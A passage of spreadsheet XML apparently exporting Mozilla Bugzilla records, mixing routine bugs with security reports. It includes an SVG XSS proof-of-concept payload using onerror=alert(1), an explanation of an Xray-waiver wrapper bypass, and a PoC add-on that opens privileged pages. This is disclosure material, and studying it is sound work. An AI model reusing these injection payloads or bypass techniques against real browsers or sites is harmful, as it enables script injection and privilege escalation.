      <c r="V2263" t="n">
        <v>30</v>
      </c>
      <c r="W2263" t="inlineStr">
        <is>
          <t>Created attachment 8589472
testcase
1. Create a profile with:
     e10 disabled
     https://www.squarefree.com/extensions/domFuzzLite3.xpi installed
2. Run: firefox -profile &lt;profiledir&gt; o.html
Assertion failure: js::CurrentThreadCanAccessRuntime(runtime_), at ../../dist/include/js/HeapAPI.h:127</t>
        </is>
      </c>
      <c r="X2263" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2264">
      <c r="A2264" t="n">
        <v>866823</v>
      </c>
      <c r="B2264" t="inlineStr">
        <is>
          <t>2013-04-29 11:12:48 -0700</t>
        </is>
      </c>
      <c r="C2264" t="inlineStr">
        <is>
          <t>Xray Waivers can be used to bypass COWs</t>
        </is>
      </c>
      <c r="D2264" t="inlineStr">
        <is>
          <t>2024-05-30 08:02:33 -0700</t>
        </is>
      </c>
      <c r="E2264" t="n">
        <v>1</v>
      </c>
      <c r="F2264" t="n">
        <v>1</v>
      </c>
      <c r="G2264" t="n">
        <v>3</v>
      </c>
      <c r="H2264" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2264" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2264" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2264" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2264" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2264" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2264" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2264" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2264" t="inlineStr">
        <is>
          <t>[qa-][adv-main22-][adv-esr1707-]</t>
        </is>
      </c>
      <c r="Q2264" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2264" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2264" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T2264" t="n">
        <v>1</v>
      </c>
      <c r="U2264" t="n">
        <v>0</v>
      </c>
      <c r="V2264" t="n">
        <v>40</v>
      </c>
      <c r="W2264" t="inlineStr">
        <is>
          <t>This is the lynchpin of bug 863933.
Basically, the prototype remapping code in WrapperFatory::Rewrap uses js::Wrapper::wrappedObject instead of js::UncheckedUnwrap to determine if the underlying object is a standard prototype. This means that if there's another wrapper in the middle (like an Xray waiver), we can be fooled into thinking that the object is not a standard prototype. However, the code in ChromeObjectWrapper.cpp unconditionally lets accesses to standard-prototype properties through, under the assumption that they'll get remapped.
To fix this, we should do a couple of things:
* Definitely stop using js::Wrapper::wrappedObject here
* Move this whole thing from prototype calculation into WrapperFactory::PrepareForWrapping so that we unconditionally get the right object when we cross the boundary.
In the long term, we should really just kill this prototype remapping stuff entirely.</t>
        </is>
      </c>
      <c r="X2264" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2265">
      <c r="A2265" t="n">
        <v>64446</v>
      </c>
      <c r="B2265" t="inlineStr">
        <is>
          <t>2001-01-05 16:20:58 -0800</t>
        </is>
      </c>
      <c r="C2265" t="inlineStr">
        <is>
          <t>Entity replacement text containing % symbol followed by whitespace causes a crash</t>
        </is>
      </c>
      <c r="D2265" t="inlineStr">
        <is>
          <t>2001-02-28 16:41:52 -0800</t>
        </is>
      </c>
      <c r="E2265" t="n">
        <v>1</v>
      </c>
      <c r="F2265" t="n">
        <v>1</v>
      </c>
      <c r="G2265" t="n">
        <v>3</v>
      </c>
      <c r="H2265" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2265" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2265" t="inlineStr">
        <is>
          <t>XML</t>
        </is>
      </c>
      <c r="K2265" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2265" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2265" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2265" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2265" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2265" t="inlineStr"/>
      <c r="Q2265" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2265" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2265" t="inlineStr">
        <is>
          <t>mozilla0.9</t>
        </is>
      </c>
      <c r="T2265" t="n">
        <v>1</v>
      </c>
      <c r="U2265" t="n">
        <v>0</v>
      </c>
      <c r="V2265" t="n">
        <v>12</v>
      </c>
      <c r="W2265" t="inlineStr">
        <is>
          <t>Build: 2001010417
Platform: Windows and Linux
Expected Results: XML Parser should display a error
What I got: The application crashes
Steps to reproduce:
1) Open negative xml test case
(http://slip/projects/marvin/xml/entity_decl_illegal_chars.xml)
2) The entity declaration contains a  % symbol followed by a space and
additional characters.
3) Opening the file will result in a crash.</t>
        </is>
      </c>
      <c r="X2265" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2266">
      <c r="A2266" t="n">
        <v>650001</v>
      </c>
      <c r="B2266" t="inlineStr">
        <is>
          <t>2011-04-14 08:33:34 -0700</t>
        </is>
      </c>
      <c r="C2266" t="inlineStr">
        <is>
          <t>SVG innerHTML getter doesn't encode entities, enabling XSS</t>
        </is>
      </c>
      <c r="D2266" t="inlineStr">
        <is>
          <t>2014-02-27 14:40:35 -0800</t>
        </is>
      </c>
      <c r="E2266" t="n">
        <v>1</v>
      </c>
      <c r="F2266" t="n">
        <v>1</v>
      </c>
      <c r="G2266" t="n">
        <v>3</v>
      </c>
      <c r="H2266" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2266" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2266" t="inlineStr">
        <is>
          <t>DOM: Serializers</t>
        </is>
      </c>
      <c r="K2266" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2266" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2266" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2266" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2266" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2266" t="inlineStr">
        <is>
          <t>[sg:moderate] high?</t>
        </is>
      </c>
      <c r="Q2266" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2266" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2266" t="inlineStr">
        <is>
          <t>mozilla6</t>
        </is>
      </c>
      <c r="T2266" t="n">
        <v>1</v>
      </c>
      <c r="U2266" t="n">
        <v>0</v>
      </c>
      <c r="V2266" t="n">
        <v>34</v>
      </c>
      <c r="W2266" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.16) Gecko/20110323 Ubuntu/10.10 (maverick) Firefox/3.6.16
Build Identifier: Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0
In-line SVG allows to have HTML entities in plain-text tags be auto decoded. This enables XSS by injecting entities via URL. Check the example link for a PoC.
PoC:
http://html5sec.org/innerhtml?xss=%3C!doctype%20html%3E%3Csvg%3E%3Cstyle%3E%26amplt;img%20src=x%20onerror=alert%281%29%26ampgt;%3Cp%3E
&lt;!doctype html&gt;&lt;svg&gt;&lt;style&gt;&amp;lt;img src=x onerror=alert(1)&amp;gt;&lt;p&gt;
// also works with crippled named entities (!!)
&lt;!doctype html&gt;&lt;svg&gt;&lt;style&gt;&amp;ltimg src=x onerror=alert(1)&amp;gt&lt;p&gt;
The bug also triggers on innerHTML/outerHTML access (see example link). No other tested browser was affected by this quirk (IE9, GC10-12, O11).
Other browsers encounter this problem by excluding a certain range of characters from being auto-decoded. FF4-6 is the only browser auto-decoding &amp;lt and &amp;gt (among others).
Tested on FF4 - 6.0a1
Reproducible: Always
Steps to Reproduce:
1. Click on the link
2. Shock
3. Awe</t>
        </is>
      </c>
      <c r="X2266" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2267">
      <c r="A2267" t="n">
        <v>92263</v>
      </c>
      <c r="B2267" t="inlineStr">
        <is>
          <t>2001-07-25 09:35:29 -0700</t>
        </is>
      </c>
      <c r="C2267" t="inlineStr">
        <is>
          <t>Don't output SQL commands before the footer.</t>
        </is>
      </c>
      <c r="D2267" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:25 -0800</t>
        </is>
      </c>
      <c r="E2267" t="n">
        <v>1</v>
      </c>
      <c r="F2267" t="n">
        <v>1</v>
      </c>
      <c r="G2267" t="n">
        <v>4</v>
      </c>
      <c r="H2267" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2267" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2267" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2267" t="inlineStr">
        <is>
          <t>2.13</t>
        </is>
      </c>
      <c r="L2267" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2267" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2267" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2267" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2267" t="inlineStr"/>
      <c r="Q2267" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2267" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2267" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T2267" t="n">
        <v>1</v>
      </c>
      <c r="U2267" t="n">
        <v>0</v>
      </c>
      <c r="V2267" t="n">
        <v>24</v>
      </c>
      <c r="W2267" t="inlineStr">
        <is>
          <t>The other day when there was problems with shadow database syncing on
mozilla.org, people (including me) were getting an SQL INSERT statement that was
an account creation, just before their footer.
This had the account's unencrypted password, as well as the person's email.  Now
we don't store cleartext passwords in 2.14, but we still shouldn't be outputting
this garbage.
I've been told that apparently it was trying to remove leftover shadow sync
commands.  That's all well and good, but it shouldn't be outputting those
commands.</t>
        </is>
      </c>
      <c r="X2267" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2268">
      <c r="A2268" t="n">
        <v>1483301</v>
      </c>
      <c r="B2268" t="inlineStr">
        <is>
          <t>2018-08-14 10:34:57 -0700</t>
        </is>
      </c>
      <c r="C2268" t="inlineStr">
        <is>
          <t>Raise the New Relic Python agent's shutdown_timeout</t>
        </is>
      </c>
      <c r="D2268" t="inlineStr">
        <is>
          <t>2018-08-15 03:20:35 -0700</t>
        </is>
      </c>
      <c r="E2268" t="n">
        <v>1</v>
      </c>
      <c r="F2268" t="n">
        <v>1</v>
      </c>
      <c r="G2268" t="n">
        <v>7</v>
      </c>
      <c r="H2268" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2268" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2268" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K2268" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2268" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2268" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2268" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2268" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2268" t="inlineStr"/>
      <c r="Q2268" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2268" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2268" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2268" t="n">
        <v>1</v>
      </c>
      <c r="U2268" t="n">
        <v>0</v>
      </c>
      <c r="V2268" t="n">
        <v>3</v>
      </c>
      <c r="W2268" t="inlineStr">
        <is>
          <t>The New Relic agent's `shutdown_timeout` setting defaults to 2.5 seconds, for compatibility with web servers that have a low default timeout threshold:
https://docs.newrelic.com/docs/agents/python-agent/configuration/python-agent-configuration#shutdown-timeout
However gunicorn's `graceful_timeout` defaults to 30 seconds, so we're fine to raise the New Relic shutdown timeout a bit:
http://docs.gunicorn.org/en/stable/settings.html#graceful-timeout
This will reduce the chance that the very last web or celery transaction doesn't get reported to New Relic, eg when Heroku performs its daily restart.</t>
        </is>
      </c>
      <c r="X2268" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2269">
      <c r="A2269" t="n">
        <v>1770048</v>
      </c>
      <c r="B2269" t="inlineStr">
        <is>
          <t>2022-05-18 14:56:10 -0700</t>
        </is>
      </c>
      <c r="C2269" t="inlineStr">
        <is>
          <t>Top-Level Await must not rely on Array.prototype</t>
        </is>
      </c>
      <c r="D2269" t="inlineStr">
        <is>
          <t>2023-01-23 01:32:43 -0800</t>
        </is>
      </c>
      <c r="E2269" t="n">
        <v>1</v>
      </c>
      <c r="F2269" t="n">
        <v>1</v>
      </c>
      <c r="G2269" t="n">
        <v>3</v>
      </c>
      <c r="H2269" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2269" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2269" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2269" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2269" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2269" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2269" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2269" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2269" t="inlineStr"/>
      <c r="Q2269" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2269" t="inlineStr">
        <is>
          <t>S1</t>
        </is>
      </c>
      <c r="S2269" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T2269" t="n">
        <v>1</v>
      </c>
      <c r="U2269" t="n">
        <v>0</v>
      </c>
      <c r="V2269" t="n">
        <v>23</v>
      </c>
      <c r="W2269" t="inlineStr">
        <is>
          <t>The TLA self-hosting code uses a bare `[]` internally and then uses `std_Array_push` which may be affected by polluted prototypes.</t>
        </is>
      </c>
      <c r="X2269" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2270">
      <c r="A2270" t="n">
        <v>475763</v>
      </c>
      <c r="B2270" t="inlineStr">
        <is>
          <t>2009-01-28 09:30:14 -0800</t>
        </is>
      </c>
      <c r="C2270" t="inlineStr">
        <is>
          <t>Hard-coded font: Monaco</t>
        </is>
      </c>
      <c r="D2270" t="inlineStr">
        <is>
          <t>2009-05-14 12:39:36 -0700</t>
        </is>
      </c>
      <c r="E2270" t="n">
        <v>1</v>
      </c>
      <c r="F2270" t="n">
        <v>1</v>
      </c>
      <c r="G2270" t="n">
        <v>6</v>
      </c>
      <c r="H2270" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2270" t="inlineStr">
        <is>
          <t>Skywriter Graveyard</t>
        </is>
      </c>
      <c r="J2270" t="inlineStr">
        <is>
          <t>Editor</t>
        </is>
      </c>
      <c r="K2270" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2270" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2270" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2270" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2270" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2270" t="inlineStr"/>
      <c r="Q2270" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2270" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2270" t="inlineStr">
        <is>
          <t>0.1.1</t>
        </is>
      </c>
      <c r="T2270" t="n">
        <v>0</v>
      </c>
      <c r="U2270" t="n">
        <v>0</v>
      </c>
      <c r="V2270" t="n">
        <v>5</v>
      </c>
      <c r="W2270" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19
Build Identifier: e504382a65dd
It appears like you use a hardcoded font name, "Monaco", for the editor and the line numbers. This font is a standard Mac font but typically not available on other platforms.
Reproducible: Always
Actual Results:  
Firefox falls back to a serif font (which looks bad), but even worse, the editor gets confused about the character widths which results in the editor being pretty much unusable.</t>
        </is>
      </c>
      <c r="X2270" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2271">
      <c r="A2271" t="n">
        <v>870371</v>
      </c>
      <c r="B2271" t="inlineStr">
        <is>
          <t>2013-05-09 07:46:39 -0700</t>
        </is>
      </c>
      <c r="C2271" t="inlineStr">
        <is>
          <t>Add Javascript interface to Android OrderedBroadcast</t>
        </is>
      </c>
      <c r="D2271" t="inlineStr">
        <is>
          <t>2018-10-11 13:48:47 -0700</t>
        </is>
      </c>
      <c r="E2271" t="n">
        <v>1</v>
      </c>
      <c r="F2271" t="n">
        <v>1</v>
      </c>
      <c r="G2271" t="n">
        <v>6</v>
      </c>
      <c r="H2271" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2271" t="inlineStr">
        <is>
          <t>Firefox Health Report Graveyard</t>
        </is>
      </c>
      <c r="J2271" t="inlineStr">
        <is>
          <t>Client: Android</t>
        </is>
      </c>
      <c r="K2271" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2271" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2271" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2271" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2271" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2271" t="inlineStr"/>
      <c r="Q2271" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2271" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2271" t="inlineStr">
        <is>
          <t>Firefox 23</t>
        </is>
      </c>
      <c r="T2271" t="n">
        <v>1</v>
      </c>
      <c r="U2271" t="n">
        <v>0</v>
      </c>
      <c r="V2271" t="n">
        <v>11</v>
      </c>
      <c r="W2271" t="inlineStr">
        <is>
          <t>We are designing Firefox Health Report on Android to mostly be implemented in Java, and with this design we need a way to trigger shuttling a report from Java to Javascript.
One way to do this is for JS to trigger Java (Fennec) to send an Android Ordered Broadcast, which a background service can then respond to.  Decoupling in this way makes it possible to swap in testing code from the Android Sync git repository.</t>
        </is>
      </c>
      <c r="X2271" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2272">
      <c r="A2272" t="n">
        <v>84325</v>
      </c>
      <c r="B2272" t="inlineStr">
        <is>
          <t>2001-06-06 10:27:18 -0700</t>
        </is>
      </c>
      <c r="C2272" t="inlineStr">
        <is>
          <t>BuildID is missing from 20010606 builds on Mac</t>
        </is>
      </c>
      <c r="D2272" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E2272" t="n">
        <v>1</v>
      </c>
      <c r="F2272" t="n">
        <v>1</v>
      </c>
      <c r="G2272" t="n">
        <v>2</v>
      </c>
      <c r="H2272" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2272" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J2272" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K2272" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2272" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M2272" t="inlineStr">
        <is>
          <t>Mac System 9.x</t>
        </is>
      </c>
      <c r="N2272" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2272" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2272" t="inlineStr">
        <is>
          <t>vtrunk</t>
        </is>
      </c>
      <c r="Q2272" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2272" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2272" t="inlineStr">
        <is>
          <t>mozilla0.9.1</t>
        </is>
      </c>
      <c r="T2272" t="n">
        <v>1</v>
      </c>
      <c r="U2272" t="n">
        <v>0</v>
      </c>
      <c r="V2272" t="n">
        <v>9</v>
      </c>
      <c r="W2272" t="inlineStr">
        <is>
          <t>The buildID is missing from the 2001060603 Mac build.  It does show on linux and
windows.
Go to about: and look at the UA string.  Here's what mine shows for Mac and win:
Mozilla/5.0 (Macintosh; U; PPC; en-US; rv:0.9.1) Gecko/ Netscape6/6.1b1
Mozilla/5.0 (Windows; U; Win98; en-US; rv:0.9.1) Gecko/20010606 Netscape6/6.1b1
It's missing from the mail header too.</t>
        </is>
      </c>
      <c r="X2272" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2273">
      <c r="A2273" t="n">
        <v>614705</v>
      </c>
      <c r="B2273" t="inlineStr">
        <is>
          <t>2010-11-24 16:21:43 -0800</t>
        </is>
      </c>
      <c r="C2273" t="inlineStr">
        <is>
          <t>Modify login to accept users with is_active=False</t>
        </is>
      </c>
      <c r="D2273" t="inlineStr">
        <is>
          <t>2010-12-10 15:38:43 -0800</t>
        </is>
      </c>
      <c r="E2273" t="n">
        <v>1</v>
      </c>
      <c r="F2273" t="n">
        <v>1</v>
      </c>
      <c r="G2273" t="n">
        <v>5</v>
      </c>
      <c r="H2273" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2273" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2273" t="inlineStr">
        <is>
          <t>Users and Groups</t>
        </is>
      </c>
      <c r="K2273" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2273" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2273" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2273" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2273" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2273" t="inlineStr"/>
      <c r="Q2273" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2273" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2273" t="inlineStr">
        <is>
          <t>2.4</t>
        </is>
      </c>
      <c r="T2273" t="n">
        <v>1</v>
      </c>
      <c r="U2273" t="n">
        <v>0</v>
      </c>
      <c r="V2273" t="n">
        <v>4</v>
      </c>
      <c r="W2273" t="inlineStr">
        <is>
          <t>Since registration/login is part of the AAQ process, we need to be able to register and immediately log in users. This can be temporary (e.g., they'd have to confirm via the email before logging in through the regular form) but we can't interrupt the process while mail travels through the system and they confirm.</t>
        </is>
      </c>
      <c r="X2273" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2274">
      <c r="A2274" t="n">
        <v>1715318</v>
      </c>
      <c r="B2274" t="inlineStr">
        <is>
          <t>2021-06-08 10:00:13 -0700</t>
        </is>
      </c>
      <c r="C2274" t="inlineStr">
        <is>
          <t>Differential Testing: Different output during TypeError</t>
        </is>
      </c>
      <c r="D2274" t="inlineStr">
        <is>
          <t>2024-05-30 10:32:08 -0700</t>
        </is>
      </c>
      <c r="E2274" t="n">
        <v>1</v>
      </c>
      <c r="F2274" t="n">
        <v>1</v>
      </c>
      <c r="G2274" t="n">
        <v>3</v>
      </c>
      <c r="H2274" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2274" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2274" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2274" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2274" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2274" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2274" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2274" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2274" t="inlineStr">
        <is>
          <t>[adv-main91+]</t>
        </is>
      </c>
      <c r="Q2274" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2274" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2274" t="inlineStr">
        <is>
          <t>91 Branch</t>
        </is>
      </c>
      <c r="T2274" t="n">
        <v>1</v>
      </c>
      <c r="U2274" t="n">
        <v>0</v>
      </c>
      <c r="V2274" t="n">
        <v>9</v>
      </c>
      <c r="W2274" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Steps to reproduce:
The following testcase produces different results on mozilla-central git commit 0e97d943bc746e4fd92902b21d3d5bebfef885a1 depending on whether ion is enabled or disabled.
```
function main() {
    let v1 = 0;
    function v18() {
        for (let v35 = 0; v35 &lt; 100; v35++) {}
        try {
            async function* v37() {}
            class V47 extends v37 {}; 
            v1 += 1;
        }   
        catch (e) {
            print("caught: " + e); 
        }   
    };  
    v18();
    v18();  // second call may or may not reach catch handler, approx 50/50
    print(v1); // either 0 or 1
}
main();
```
Actual results:
Running the sample with ion disabled (obj-x86_64-pc-linux-gnu/dist/bin/js --no-threads --cpu-count=1 --baseline-warmup-threshold=10 --fuzzing-safe --differential-testing --no-ion diff.js) causes two exceptions to be thrown, v1 is 0 at the end of main().
If ion is enabled (obj-x86_64-pc-linux-gnu/dist/bin/js --no-threads --cpu-count=1 --ion-offthread-compile=off --baseline-warmup-threshold=10 --ion-warmup-threshold=100 --ion-check-range-analysis --ion-extra-checks --fuzzing-safe --differential-testing diff.js), the second execution of v18() may or may not (approx. 50/50) throw an exception. v1 is either 0 or 1 at the end of main().
Marking as security as a few differential execution bugs were flagged in the past.</t>
        </is>
      </c>
      <c r="X2274" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2275">
      <c r="A2275" t="n">
        <v>1425267</v>
      </c>
      <c r="B2275" t="inlineStr">
        <is>
          <t>2017-12-14 09:11:25 -0800</t>
        </is>
      </c>
      <c r="C2275" t="inlineStr">
        <is>
          <t>browser.identity.launchWebAuthFlow can open privileged pages</t>
        </is>
      </c>
      <c r="D2275" t="inlineStr">
        <is>
          <t>2024-05-30 09:41:14 -0700</t>
        </is>
      </c>
      <c r="E2275" t="n">
        <v>1</v>
      </c>
      <c r="F2275" t="n">
        <v>1</v>
      </c>
      <c r="G2275" t="n">
        <v>3</v>
      </c>
      <c r="H2275" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2275" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J2275" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2275" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L2275" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2275" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2275" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2275" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2275" t="inlineStr">
        <is>
          <t>[adv-main58+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2275" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2275" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2275" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T2275" t="n">
        <v>0</v>
      </c>
      <c r="U2275" t="n">
        <v>0</v>
      </c>
      <c r="V2275" t="n">
        <v>13</v>
      </c>
      <c r="W2275" t="inlineStr">
        <is>
          <t>Created attachment 8936863
google-userinfo.zip
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Steps to reproduce:
1. Unpack attached PoC addon
2. Go to about:debugging and temporarily load the unpacked addon
3. 'about:addons' is opened in new window
Actual results:
browser.identity.launchWebAuthFlow does not check whether the passed URL is http/s only. We can open privileged about: pages as well as file: urls.
Expected results:
